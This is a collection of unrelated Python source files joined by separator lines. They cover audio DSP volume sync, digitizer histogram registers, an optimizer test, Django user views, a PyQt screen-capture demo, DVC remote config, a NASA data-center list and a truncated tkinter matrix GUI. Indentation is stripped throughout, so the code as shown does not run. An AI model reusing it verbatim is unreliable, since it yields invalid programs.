matches_path = os.path.join(here, forms_path)
return load_json(matches_path)
def get_match_dict(match_path="resources/match_dict.json"):
matches_path = os.path.join(here, match_path)
return load_json(matches_path)
def get_match_dict_schema(schema_path="resources/match_dict_schema.json"):
full_schema_path = os.path.join(here, schema_path)
return load_json(full_schema_path)
def get_patterns_test_data(data_path="resources/patterns_test_data.json"):
test_data_path = os.path.join(here, data_path)
return load_json(test_data_path)
def load_lm(model_path):
import kenlm
return kenlm.Model(model_path)
|
python
|
'''
Copyright (c) 2018 Modul 9/HiFiBerry
2020 Christoffer Sawicki
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import time
import logging
import struct
from threading import Thread
from hifiberrydsp.filtering.volume import percent2amplification
from hifiberrydsp import datatools
try:
from hifiberrydsp.hardware.adau145x import Adau145x
from hifiberrydsp.hardware.spi import SpiHandler
# depends on spidev and is not required to run tests
except:
pass
class SoundSync(Thread):
'''
Implements reverse-engineered LG Sound Sync to set main volume control
'''
def __init__(self):
self.dsp = Adau145x
self.spi = SpiHandler
self.finished = False
self.detected = False
self.volume_register = None
self.spdif_active_register = None
Thread.__init__(self)
def set_registers(self, volume_register, spdif_active_register):
logging.info("LG Sound Sync: Using volume register at %s and SPDIF active register at %s",
volume_register, spdif_active_register)
self.volume_register = volume_register
self.spdif_active_register = spdif_active_register
def update_volume(self):
if self.volume_register is None:
return False
if (self.spdif_active_register is not None) and (not self.is_spdif_active()):
return False
volume = self.try_read_volume()
if volume is None:
return False
self.write_volume(volume)
return True
def is_spdif_active(self):
if self.spdif_active_register is None:
return True
data = self.spi.read(self.spdif_active_register, 4)
[spdif_active] = struct.unpack(">l", data)
return spdif_active != 0
def try_read_volume(self):
spdif_status_register = 0xf617
return self.parse_volume_from_status(self.spi.read(spdif_status_register, 5))
# Volume ~~~~~
# 0: 00f048a$ This is what the SPDIF status registers look like with different volume levels set.
# 1: 01f048a$
# 2: 02f048a$ We check for f048a (SIGNATURE_VALUE) to see if LG Sound Sync is enabled.
# 3: 03f048a$
# 100: 64f048a$ The byte to the left is the volume we want to extract.
# ~~ The first bit is set to 1 when muted.
SIGNATURE_MASK = 0xfffff
SIGNATURE_VALUE = 0xf048a
SHIFT = 5 * 4
MUTE_MASK = 0b10000000
VOLUME_MASK = 0b01111111
@staticmethod
def parse_volume_from_status(data):
bits = int.from_bytes(data, byteorder="big")
if bits & SoundSync.SIGNATURE_MASK != SoundSync.SIGNATURE_VALUE:
return None
if bits >> SoundSync.SHIFT & SoundSync.MUTE_MASK:
return 0
return bits >> SoundSync.SHIFT & SoundSync.VOLUME_MASK
def write_volume(self, volume):
assert 0 <= volume <= 100
dspdata = datatools.int_data(self.dsp.decimal_repr(percent2amplification(volume)),
self.dsp.WORD_LENGTH)
self.spi.write(self.volume_register, dspdata)
POLL_INTERVAL = 0.3
def run(self):
try:
while not self.finished:
previously_detected = self.detected
self.detected = self.update_volume()
if not previously_detected and self.detected:
logging.info("LG Sound Sync started")
elif previously_detected and not self.detected:
logging.info("LG Sound Sync stopped")
if self.detected:
time.sleep(self.POLL_INTERVAL)
else:
time.sleep(self.POLL_INTERVAL * 10)
except Exception:
logging.exception("LG Sound Sync crashed")
def finish(self):
self.finished = True
|
python
|
# Module fwpd_histogram
import ctypes as ct
import time
from modules.example_helpers import *
def enable_characterization(ADQAPI, adq_cu, adq_num, channel, enable, only_metadata):
# Enable logic and release reset
assert (channel < 5 and channel > 0), "Channel must be between 1-4."
# Lookup base address for histogram setup registers
base_addr = (channel-1) * (2**(21-2-2)) + 1*(2**(21-2-4))
# Pull reset (create a negedge)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffd, 0x00000002, 0)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffd, 0x00000000, 0)
# Enable characterization if 'enable' is True
if enable:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff9, 0x00000002, 0)
else:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff9, 0x00000006, 0)
# Enable metadata mode if 'only_metadata' is True
if only_metadata:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff7, 0x00000008, 0)
else:
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffff7, 0x00000000, 0)
# Strobe register load bit (for enable)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffe, 0x00000001, 0)
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0xfffffffe, 0x00000000, 0)
def _setup(ADQAPI, adq_cu, adq_num, base_addr, scale, offset):
# Set histogram bin scaling
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr, 0x00000000, scale, 0)
# Set histogram bin offset
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr+1, 0x00000000, offset, 0)
def _reset(ADQAPI, adq_cu, adq_num, base_addr, hist_size):
# Write zero to all bins
if ADQAPI.ADQ_IsUSB3Device(adq_cu, adq_num):
zero_block = (ct.c_uint32*hist_size)()
ct.memset(ct.byref(zero_block), 0, hist_size)
status = ADQAPI.ADQ_WriteBlockUserRegister(adq_cu, adq_num, 2, base_addr, ct.byref(zero_block), hist_size*4, 1)
print('ADQAPI.ADQ_WriteBlockUserRegister returned {}'.format(adq_status(status)))
else:
for idx in range(hist_size):
ADQAPI.ADQ_WriteUserRegister(adq_cu, adq_num, 2, base_addr+idx, 0x0, 0x0, 0)
def _fetch(ADQAPI, adq_cu, adq_num, base_addr, hist_size):
# Fetch data from histogram memory
hist = (ct.c_uint32*hist_size)()
if ADQAPI.ADQ_IsUSB3Device(adq_cu, adq_num):
ADQAPI.ADQ_ReadBlockUserRegister(adq_cu, adq_num, 2, base_addr, ct.byref(hist), hist_size*4, 1)
else:
value = ct.c_uint32()
for idx in range(hist_size):
ADQAPI.ADQ_ReadUserRegister(adq_cu, adq_num, 2, base_addr+idx, ct.byref(value))
hist[idx] = value.value
return hist
def _get_mem_base(channel, hist_type):
# Lookup base address for histogram memory
assert (channel < 5 and channel > 0), "Channel must be between 1-4."
if (hist_type == 'tot'):
return (channel-1) * (2**(21-2-2)) + 2*(2**(21-2-4))
if (hist_type == 'extr'):
return (channel-1) * (2**(21-2-2)) + 3*(2**(21-2-4))
else:
assert False, "Unknown hist_type {}.".format(hist_type)
def _get_setup_base(channel, hist_type):
# Lookup base address for histogram setup registers
assert (channel < 5 and channel > 0), "Channel must be between 1-4."
if (hist_type == 'tot'):
return (channel-1) * (2**(21-2-2)) + 1*(2**(21-2-4)) + 1
if (hist_type == 'extr'):
return (channel-1) * (2**(21-2-2)) + 1*(2**(21-2-4)) + 4
else:
assert False, "Unknown hist_type {}.".format(hist_type)
def _get_hist_size(hist_type):
# Lookup histogram size
if (hist_type == 'tot'):
# TOT histogram is 4k+3 bins
return 1024*16+3
if (hist_type == 'extr'):
# TOT histogram is 16k+3 bins
return 1024*4+3
else:
assert False, "Unknown hist_type {}.".format(hist_type)
def setup_tot(ADQAPI, adq_cu, adq_num, channel, scale, offset):
return _setup(ADQAPI, adq_cu, adq_num, _get_setup_base(channel, 'tot'), scale, offset)
def setup_extr(ADQAPI, adq_cu, adq_num, channel, scale, offset):
return _setup(ADQAPI, adq_cu, adq_num, _get_setup_base(channel, 'extr'), scale, offset)
def reset_tot(ADQAPI, adq_cu, adq_num, channel):
return _reset(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'tot'), _get_hist_size('tot'))
def reset_extr(ADQAPI, adq_cu, adq_num, channel):
return _reset(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'extr'), _get_hist_size('extr'))
def fetch_tot(ADQAPI, adq_cu, adq_num, channel):
return _fetch(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'tot'), _get_hist_size('tot'))
def fetch_extr(ADQAPI, adq_cu, adq_num, channel):
return _fetch(ADQAPI, adq_cu, adq_num, _get_mem_base(channel, 'extr'), _get_hist_size('extr'))
|
python
|
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import pytest
import mlos.global_values
from mlos.OptimizerEvaluationTools.ObjectiveFunctionFactory import ObjectiveFunctionFactory, objective_function_config_store
from mlos.Optimizers.RegressionModels.GoodnessOfFitMetrics import DataSetType
from mlos.Optimizers.RegressionModels.LassoCrossValidatedConfigStore import lasso_cross_validated_config_store
from mlos.Optimizers.RegressionModels.LassoCrossValidatedRegressionModel import LassoCrossValidatedRegressionModel
from mlos.Optimizers.RegressionModels.MultiObjectiveLassoCrossValidated import MultiObjectiveLassoCrossValidated
from mlos.Logger import create_logger
class TestMultiObjectiveLassoCrossValidated:
@classmethod
def setup_class(cls) -> None:
mlos.global_values.declare_singletons()
cls.logger = create_logger("TestMultiObjectiveLassoCrossValidated")
@pytest.mark.parametrize('objective_function_config_name', ["2d_hypersphere_minimize_some", "10d_hypersphere_minimize_some", "5_mutually_exclusive_polynomials"])
def test_default_config(self, objective_function_config_name):
objective_function_config = objective_function_config_store.get_config_by_name(objective_function_config_name)
objective_function = ObjectiveFunctionFactory.create_objective_function(objective_function_config)
lasso_model_config = lasso_cross_validated_config_store.default
multi_objective_rf = MultiObjectiveLassoCrossValidated(
model_config=lasso_model_config,
input_space=objective_function.parameter_space,
output_space=objective_function.output_space,
logger=self.logger
)
if objective_function_config_name == '2d_hypersphere_minimize_some':
num_training_samples = 25
num_testing_samples = 10
elif objective_function_config_name == '10d_hypersphere_minimize_some':
num_training_samples = 50
num_testing_samples = 10
elif objective_function_config_name == '5_mutually_exclusive_polynomials':
num_training_samples = 100
num_testing_samples = 50
else:
assert False
train_params_df = objective_function.parameter_space.random_dataframe(num_samples=num_training_samples)
train_objectives_df = objective_function.evaluate_dataframe(train_params_df)
test_params_df = objective_function.parameter_space.random_dataframe(num_samples=num_testing_samples)
test_objectives_df = objective_function.evaluate_dataframe(test_params_df)
multi_objective_rf.fit(features_df=train_params_df, targets_df=train_objectives_df, iteration_number=num_training_samples)
multi_objective_predictions = multi_objective_rf.predict(features_df=train_params_df, include_only_valid_rows=True)
# TRAINING DATA
#
print("------------------------------------------------------------------------------------")
print("--------------------------------------- TRAIN --------------------------------------")
print("------------------------------------------------------------------------------------")
training_gof = multi_objective_rf.compute_goodness_of_fit(features_df=train_params_df, targets_df=train_objectives_df, data_set_type=DataSetType.TRAIN)
for objective_name in objective_function.output_space.dimension_names:
print("------------------------------------------------------------------------------------")
print(objective_name)
print(training_gof[objective_name].to_json(indent=2))
# TESTING DATA
print("------------------------------------------------------------------------------------")
print("--------------------------------------- TEST ---------------------------------------")
print("------------------------------------------------------------------------------------")
testing_gof = multi_objective_rf.compute_goodness_of_fit(features_df=test_params_df, targets_df=test_objectives_df, data_set_type=DataSetType.TEST_KNOWN_RANDOM)
for objective_name in objective_function.output_space.dimension_names:
print("------------------------------------------------------------------------------------")
print(objective_name)
print(testing_gof[objective_name].to_json(indent=2))
|
python
|
from allauth.account import signals
from allauth.account.views import SignupView
from allauth.account.utils import send_email_confirmation
from allauth.exceptions import ImmediateHttpResponse
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.http import HttpRequest, HttpResponseRedirect
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.views.generic import (
CreateView,
DeleteView,
DetailView,
ListView,
RedirectView,
UpdateView,
)
from arike.facilities.models import Facility
from arike.users.forms import UserForm, UserSignupForm
from arike.users.models import UserRoles
User = get_user_model()
class AdminAuthMixin(LoginRequiredMixin, UserPassesTestMixin):
def test_func(self):
return self.request.user.role == UserRoles.DISTRICT_ADMIN
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserFormView(AdminAuthMixin):
form_class = UserForm
template_name = "users/user_form.html"
slug_field = "username"
slug_url_kwarg = "username"
def get_queryset(self):
district = self.request.user.facility.ward.lsg_body.district
users = User.objects.filter(
deleted=False, facility__ward__lsg_body__district=district
).exclude(role=UserRoles.DISTRICT_ADMIN)
return users
def get_success_url(self):
return "/users/list/"
class NurseSignUpView(AdminAuthMixin, SignupView):
form_class = UserSignupForm
template_name = "users/user_form.html"
slug_field = "username"
slug_url_kwarg = "username"
def get_success_url(self):
return "/users/list/"
def form_valid(self, form):
self.user = form.save(self.request)
try:
signals.user_signed_up.send(
sender=self.user.__class__, request=self.request, user=self.user, **{}
)
send_email_confirmation(self.request, self.user, True)
return HttpResponseRedirect(self.get_success_url())
except ImmediateHttpResponse as e:
return e.response
class NurseDeleteView(UserFormView, DeleteView):
def delete(self, request: HttpRequest, *args: str, **kwargs):
self.object = self.get_object()
success_url = self.get_success_url()
self.object.deleted = True
self.object.save()
return HttpResponseRedirect(success_url)
class NurseUpdateView(UserFormView, UpdateView):
pass
class UserListVeiw(AdminAuthMixin, ListView):
model = User
template_name = "users/list.html"
context_object_name = "users"
def get_queryset(self):
district = self.request.user.facility.ward.lsg_body.district
users = User.objects.filter(
deleted=False, facility__ward__lsg_body__district=district
).exclude(role=UserRoles.DISTRICT_ADMIN)
search_filter = self.request.GET.get("search")
role_filter = self.request.GET.get("role")
facility_filter = self.request.GET.get("facility")
if search_filter is not None:
users = users.filter(name__icontains=search_filter)
if role_filter is not None:
users = users.filter(role=role_filter)
if facility_filter is not None:
users = users.filter(facility=facility_filter)
return users
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
district = self.request.user.facility.ward.lsg_body.district
ctx["facilities"] = Facility.objects.filter(ward__lsg_body__district=district)
return ctx
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name", "email", "phone", "facility"]
success_message = _("Information successfully updated")
def get_success_url(self):
assert (
self.request.user.is_authenticated
) # for mypy to know that the user is authenticated
return self.request.user.get_absolute_url()
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
user_redirect_view = UserRedirectView.as_view()
|
python
|
# encoding: utf-8
import sys
from PyQt5 import QtQuick
from PyQt5.QtCore import QObject, pyqtSlot, QTimer
from PyQt5.QtGui import QIcon
from PyQt5.QtQml import QQmlApplicationEngine
from PyQt5.QtWidgets import QWidget, QApplication, QLabel
from resources import resources
print(QtQuick)
print(resources)
class MyAppMainWindow(QWidget):
def __init__(self):
super(MyAppMainWindow, self).__init__()
self.initUI()
def initUI(self):
##
self.resize(800, 600)
##
self.label = QLabel(self)
self.label.setText("哈哈哈哈")
##
screen = QApplication.primaryScreen()
qpixmap = screen.grabWindow(0)
print(qpixmap)
self.label.setPixmap(qpixmap)
##
self.setWindowTitle("My First PyQt5 App")
self.setWindowIcon(QIcon('icon.ico'))
#
self.show()
class ScreenCaptureWindow(QWidget):
def __init__(self):
super(ScreenCaptureWindow, self).__init__()
self.index = 0
self.resize(800, 600)
self.setWindowTitle("录屏实况")
self.label = QLabel(self)
self.timer = QTimer()
self.timer.timeout.connect(self.capture_screen)
self.capture_screen()
def capture_screen(self):
self.index += 1
screen = QApplication.primaryScreen()
screen_img = screen.grabWindow(0)
self.label.setPixmap(screen_img)
print(screen_img)
print("截图:" + str(self.index))
def capture_screen_start(self):
self.show()
self.timer.start(100)
def capture_screen_stop(self):
self.hide()
self.timer.stop()
class MyClass(QObject):
def __init__(self):
super(MyClass, self).__init__()
self.scw = ScreenCaptureWindow()
@pyqtSlot(str)
def screen_capture_start(self):
self.scw.capture_screen_start()
@pyqtSlot(str)
def screen_capture_stop(self):
self.scw.capture_screen_stop()
if __name__ == "__main__":
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
# engine.load("resources/qmls/app_main_window.qml")
# engine.load(QUrl("qrc:/resources/qmls/app_main_window.qml"))
engine.load(":/resources/qmls/app_main_window.qml")
con = MyClass()
context = engine.rootContext()
context.setContextProperty("con", con)
# myApp = MyAppMainWindow()
sys.exit(app.exec_())
|
python
|
import logging
import os
import posixpath
from dvc.config import Config
from dvc.config import ConfigError
from dvc.utils import relpath
from dvc.utils.compat import urlparse
logger = logging.getLogger(__name__)
class RemoteConfig(object):
def __init__(self, config):
self.config = config
def get_settings(self, name):
"""
Args:
name (str): The name of the remote that we want to retrieve
Returns:
dict: The content beneath the given remote name.
Example:
>>> config = {'remote "server"': {'url': 'ssh://localhost/'}}
>>> get_settings("server")
{'url': 'ssh://localhost/'}
"""
settings = self.config.config.get(
Config.SECTION_REMOTE_FMT.format(name.lower())
)
if settings is None:
raise ConfigError(
"unable to find remote section '{}'".format(name)
)
parsed = urlparse(settings["url"])
# Support for cross referenced remotes.
# This will merge the settings, giving priority to the outer reference.
# For example, having:
#
# dvc remote add server ssh://localhost
# dvc remote modify server user root
# dvc remote modify server ask_password true
#
# dvc remote add images remote://server/tmp/pictures
# dvc remote modify images user alice
# dvc remote modify images ask_password false
# dvc remote modify images password asdf1234
#
# Results on a config dictionary like:
#
# {
# "url": "ssh://localhost/tmp/pictures",
# "user": "alice",
# "password": "asdf1234",
# "ask_password": False,
# }
#
if parsed.scheme == "remote":
reference = self.get_settings(parsed.netloc)
url = posixpath.join(reference["url"], parsed.path.lstrip("/"))
merged = reference.copy()
merged.update(settings)
merged["url"] = url
return merged
return settings
@staticmethod
def resolve_path(path, config_file):
"""Resolve path relative to config file location.
Args:
path: Path to be resolved.
config_file: Path to config file, which `path` is specified
relative to.
Returns:
Path relative to the `config_file` location. If `path` is an
absolute path then it will be returned without change.
"""
if os.path.isabs(path):
return path
return relpath(path, os.path.dirname(config_file))
def add(self, name, url, default=False, force=False, level=None):
from dvc.remote import _get, RemoteLOCAL
configobj = self.config.get_configobj(level)
remote = _get({Config.SECTION_REMOTE_URL: url})
if remote == RemoteLOCAL and not url.startswith("remote://"):
url = self.resolve_path(url, configobj.filename)
self.config.set(
Config.SECTION_REMOTE_FMT.format(name),
Config.SECTION_REMOTE_URL,
url,
force=force,
level=level,
)
if default:
logger.info("Setting '{}' as a default remote.".format(name))
self.config.set(
Config.SECTION_CORE,
Config.SECTION_CORE_REMOTE,
name,
level=level,
)
def remove(self, name, level=None):
self.config.unset(Config.SECTION_REMOTE_FMT.format(name), level=level)
if level is None:
level = Config.LEVEL_REPO
for lev in [
Config.LEVEL_LOCAL,
Config.LEVEL_REPO,
Config.LEVEL_GLOBAL,
Config.LEVEL_SYSTEM,
]:
self.config.unset(
Config.SECTION_CORE,
Config.SECTION_CORE_REMOTE,
level=lev,
force=True,
)
if lev == level:
break
def modify(self, name, option, value, level=None):
self.config.set(
Config.SECTION_REMOTE_FMT.format(name), option, value, level=level
)
def list(self, level=None):
return self.config.list_options(
Config.SECTION_REMOTE_REGEX, Config.SECTION_REMOTE_URL, level=level
)
def set_default(self, name, unset=False, level=None):
if unset:
self.config.unset(Config.SECTION_CORE, Config.SECTION_CORE_REMOTE)
return
self.config.set(
Config.SECTION_CORE, Config.SECTION_CORE_REMOTE, name, level=level
)
|
python
|
# DAACS ~= NASA Earthdata data centers
DAACS = [
{
"short-name": "NSIDC",
"name": "National Snow and Ice Data Center",
"homepage": "https://nsidc.org",
"cloud-providers": ["NSIDC_CPRD"],
"on-prem-providers": ["NSIDC_ECS"],
"s3-credentials": "https://data.nsidc.earthdatacloud.nasa.gov/s3credentials",
},
{
"short-name": "GHRC DAAC",
"name": "Global Hydrometeorology Resource Center",
"homepage": "https://ghrc.nsstc.nasa.gov/home/",
"cloud-providers": ["GHRC_DAAC"],
"on-prem-providers": ["GHRC_DAAC"],
"s3-credentials": "https://data.ghrc.earthdata.nasa.gov/s3credentials",
},
{
"short-name": "PO DAAC",
"name": "Physical Oceanography Distributed Active Archive Center",
"homepage": "https://podaac.jpl.nasa.gov",
"cloud-providers": ["POCLOUD"],
"on-prem-providers": ["PODAAC"],
"s3-credentials": "https://archive.podaac.earthdata.nasa.gov/s3credentials",
},
{
"short-name": "ASF",
"name": "Alaska Satellite Facility",
"homepage": "https://asf.alaska.edu",
"cloud-providers": ["ASF"],
"on-prem-providers": ["ASF"],
"s3-credentials": "",
},
{
"short-name": "ORNL DAAC",
"name": "Oak Ridge National Laboratory",
"homepage": "https://daac.ornl.gov",
"cloud-providers": ["ORNL_CLOUD"],
"on-prem-providers": ["ORNL_DAAC"],
"s3-credentials": "https://data.ornldaac.earthdata.nasa.gov/s3credentials",
},
{
"short-name": "LP DAAC",
"name": " Land Processes Distributed Active Archive Center",
"homepage": "https://lpdaac.usgs.gov",
"cloud-providers": ["LPCLOUD"],
"on-prem-providers": ["LPDAAC_ECS"],
"s3-credentials": "https://data.lpdaac.prod.earthdatacloud.nasa.gov/s3credentials",
},
{
"short-name": "GES DISC",
"name": "NASA Goddard Earth Sciences (GES) Data and Information Services Center (DISC)",
"homepage": "https://daac.gsfc.nasa.gov",
"cloud-providers": ["GES_DISC"],
"on-prem-providers": ["GES_DISC"],
"s3-credentials": "",
},
{
"short-name": "OB DAAC",
"name": "NASA's Ocean Biology Distributed Active Archive Center",
"homepage": "https://earthdata.nasa.gov/eosdis/daacs/obdaac",
"cloud-providers": [],
"on-prem-providers": ["OB_DAAC"],
"s3-credentials": "",
},
{
"short-name": "SEDAC",
"name": "NASA's Socioeconomic Data and Applications Center",
"homepage": "https://earthdata.nasa.gov/eosdis/daacs/sedac",
"cloud-providers": [],
"on-prem-providers": ["SEDAC"],
"s3-credentials": "",
},
]
CLOUD_PROVIDERS = [
"GES_DISC",
"LPCLOUD",
"NSIDC_CPRD",
"POCLOUD",
"ASF",
"GHRC_DAAC",
"ORNL_CLOUD",
]
|
python
|
from tkinter import *
from SMExp import*
from DMExp import*
import pygame
import time
import random
class SMPage(Frame):
MUTE = False
INFO = False
DIM = 0
def __init__(self, parent, controller):
Frame.__init__(self, parent)
pygame.mixer.init()
SGMWall = PhotoImage(file="TwoDimension.png")
SGLabel = Label(self, image=SGMWall)
SGLabel.image = SGMWall
SGLabel.place(x=-2, y=-2)
Info = PhotoImage(file="InfoPopOne.png")
InfoPop = Label(self, image=Info)
InfoPop.image = Info
InfoPop.place(x=-2, y=-2)
InfoPop.lower()
Back = PhotoImage(file="DisneyBackbutton.png")
BackBtn = Button(self, image=Back, bd=0, bg='#182b3a', command=lambda: BackAct())
BackBtn.image = Back
BackBtn.place(x=-2, y=-2)
Info = PhotoImage(file="DisneyInfoButton.png")
InfoBtn = Button(self, image=Info, bd=0, bg='black', command=lambda: InfoAct())
InfoBtn.image = Info
InfoBtn.place(x=-2, y=698)
Music = PhotoImage(file="DisneyMusicOn.png")
MusicBtn = Button(self, image=Music, bd=0, bg='black', command=lambda: MuteAct())
MusicBtn.image = Music
MusicBtn.place(x=48, y=698)
MusicOff = PhotoImage(file="DisneyMusicOff.png")
MuteOff = Button(self, image=MusicOff, bd=0, bg='black', command=lambda: MuteAct())
MuteOff.image = MusicOff
MuteOff.place(x=48, y=698)
MuteOff.lower()
Random = PhotoImage(file="DisneyRandomButton.png")
RandBtn = Button(self, image=Random, bd=0, bg="black", command=lambda: RandAct())
RandBtn.image = Random
RandBtn.place(x=98, y=698)
Reset = PhotoImage(file="DisneyClearButton.png")
ResetBtn = Button(self, image=Reset, bd=0, bg="black", command=lambda: ResetAct())
ResetBtn.image = Reset
ResetBtn.place(x=148, y=698)
Dtm = PhotoImage(file="Button1.png")
DtmBtn = Button(self, image=Dtm, bd=0, command=lambda: DtmAct())
DtmBtn.image = Dtm
DtmBtn.place(x=48, y=174)
Inverse = PhotoImage(file="Button2.png")
InverseBtn = Button(self, image=Inverse, bd=0, command=lambda: InvAct())
InverseBtn.image = Inverse
InverseBtn.place(x=48, y=282)
Trans = PhotoImage(file="Button3.png")
TransBtn = Button(self, image=Trans, bd=0, command=lambda: TrpAct())
TransBtn.image = Trans
TransBtn.place(x=48, y=390)
Scal = PhotoImage(file="Button4.png")
ScalBtn = Button(self, image=Scal, bd=0, command=lambda: ScaAct())
ScalBtn.image = Scal
ScalBtn.place(x=48, y=498)
Multi = PhotoImage(file="Button5.png")
MultiBtn = Button(self, image=Multi, bd=0, command=lambda: MulAct())
MultiBtn.image = Multi
MultiBtn.place(x=48, y=606)
Triangle = PhotoImage(file="Button6.png")
TriangleBtn = Button(self, image=Triangle, bd=0, command=lambda: TriAct())
TriangleBtn.image = Triangle
TriangleBtn.place(x=281, y=174)
Trac = PhotoImage(file="Button7.png")
TraceBtn = Button(self, image=Trac, bd=0, command=lambda: TrcAct())
TraceBtn.image = Trac
TraceBtn.place(x=281, y=282)
LUdec = PhotoImage(file="Button8.png")
LUdecBtn = Button(self, image=LUdec, bd=0, command=lambda: LUDAct())
LUdecBtn.image = LUdec
LUdecBtn.place(x=281, y=390)
Rank = PhotoImage(file="Button9.png")
RankBtn = Button(self, image=Rank, bd=0, command=lambda: RanAct())
RankBtn.image = Rank
RankBtn.place(x=281, y=498)
Pwr = PhotoImage(file="Button10.png")
PwrBtn = Button(self, image=Pwr, bd=0, command=lambda: PowAct())
PwrBtn.image = Pwr
PwrBtn.place(x=281, y=606)
TwoMatrix = PhotoImage(file="twoD.png")
TwoMatrixBtn = Button(self, image=TwoMatrix, bd=0, command=lambda: EntLIFT2())
TwoMatrixBtn.image = TwoMatrix
TwoMatrixBtn.place(x=514, y=403)
ThreeMatrix = PhotoImage(file="threeD.png")
ThreeMatrixBtn = Button(self, image=ThreeMatrix, bd=0, command=lambda: EntLIFT3())
ThreeMatrixBtn.image = ThreeMatrix
ThreeMatrixBtn.place(x=634, y=403)
FourMatrix = PhotoImage(file="fourD.png")
FourMatrixBtn = Button(self, image=FourMatrix, bd=0, command=lambda: EntLIFT4())
FourMatrixBtn.image = FourMatrix
FourMatrixBtn.place(x=754, y=403)
def validate(string):
regex = re.compile(r"(\+|\-)?[0-9.]*$")
result = regex.match(string)
return (string == ""
or (string.count('+') <= 1
and string.count('-') <= 1
and string.count('.') <= 1
and result is not None
and result.group(0) != ""))
def on_validate(P):
return validate(P)
M1aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1aEnt.config(validatecommand=(M1aEnt.register(on_validate), '%P'))
M1aEnt.place(x=529, y=61, width=50, height=50)
M1bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1bEnt.config(validatecommand=(M1bEnt.register(on_validate), '%P'))
M1bEnt.place(x=609, y=61, width=50, height=50)
M1cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1cEnt.config(validatecommand=(M1cEnt.register(on_validate), '%P'))
M1cEnt.place(x=689, y=61, width=50, height=50)
M1dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1dEnt.config(validatecommand=(M1dEnt.register(on_validate), '%P'))
M1dEnt.place(x=769, y=61, width=50, height=50)
M2aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2aEnt.config(validatecommand=(M2aEnt.register(on_validate), '%P'))
M2aEnt.place(x=529, y=146, width=50, height=50)
M2bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2bEnt.config(validatecommand=(M2bEnt.register(on_validate), '%P'))
M2bEnt.place(x=609, y=146, width=50, height=50)
M2cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2cEnt.config(validatecommand=(M2cEnt.register(on_validate), '%P'))
M2cEnt.place(x=689, y=146, width=50, height=50)
M2dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2dEnt.config(validatecommand=(M2dEnt.register(on_validate), '%P'))
M2dEnt.place(x=769, y=146, width=50, height=50)
M3aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3aEnt.config(validatecommand=(M3aEnt.register(on_validate), '%P'))
M3aEnt.place(x=529, y=231, width=50, height=50)
M3bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3bEnt.config(validatecommand=(M3bEnt.register(on_validate), '%P'))
M3bEnt.place(x=609, y=231, width=50, height=50)
M3cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3cEnt.config(validatecommand=(M3cEnt.register(on_validate), '%P'))
M3cEnt.place(x=689, y=231, width=50, height=50)
M3dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3dEnt.config(validatecommand=(M3dEnt.register(on_validate), '%P'))
M3dEnt.place(x=769, y=231, width=50, height=50)
M4aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
